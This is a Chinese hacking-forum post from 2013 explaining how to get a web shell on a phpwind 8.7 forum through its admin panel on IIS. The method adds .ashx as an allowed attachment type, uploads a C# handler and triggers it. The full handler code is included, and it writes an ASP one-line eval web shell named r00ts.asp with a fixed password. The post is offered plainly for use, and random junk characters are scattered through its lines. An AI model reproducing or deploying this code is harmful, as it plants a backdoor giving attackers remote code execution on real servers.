找回密码
 立即注册
查看: 2572|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
6 R/ V% l& B9 U6 T' L) `
2 {) J2 ]" X  o, e群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
/ b# r; P9 {0 i2 {+ S% R: k8 c ; A9 f! `4 f: L, \2 u" K% ]
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整( U& U, ~6 j5 D4 i7 h) o

6 R/ z4 ]- x, {. u! R4 m然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx0 J4 S5 T  H: C! i7 P

/ Y- H, k' [% ^+ t# g6 ~6 c6 f打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
9 n' o; B* a0 N , a) _8 r4 @3 A9 ^9 u7 @9 t: h* N
下面是代码:
( |( j% z; R! j4 N3 P# g
. r9 T7 s/ d8 _, w9 c- H' ~<%@ WebHandler Language="C#"Class="Handler" %>
) Y- I) I+ D% j4 ]1 Ousing System;
) ?/ P: E; |8 _! N0 {2 Nusing System.Web;
2 ?+ n( x7 ]0 p, W0 {0 Xusing System.IO;
: K5 |* \/ `$ i- e4 g4 }public class Handler : IHttpHandler {# F2 }  Y% i( K: |: S
public void ProcessRequest (HttpContext context) {
! N4 V$ I! x2 Q" I$ U; V+ N: Ucontext.Response.ContentType = "text/plain";" Z7 ^# k/ s9 p6 h* U
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));6 y* }3 }9 n4 R' l0 Y2 {
file1.Write("<%eval request(\"r00ts\")%>");
  s) v$ d6 E, p% d% Xfile1.Flush();/ O3 k' C( g6 _0 d
file1.Close();0 }, }7 p. p  k3 j
}6 c" y% l2 e: L/ y1 k7 V4 d: _9 o4 S
public bool IsReusable {
6 o& d/ U6 n! a& \8 hget {
, ^7 E  L- [( K! W0 V' T  Yreturn false;* t0 b4 I: `# A( B3 i9 J9 R
}
# c2 C' q6 G' F1 }}
0 P) w: D1 {. z1 T}
/ L" F+ }8 c" x+ k/ I8 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表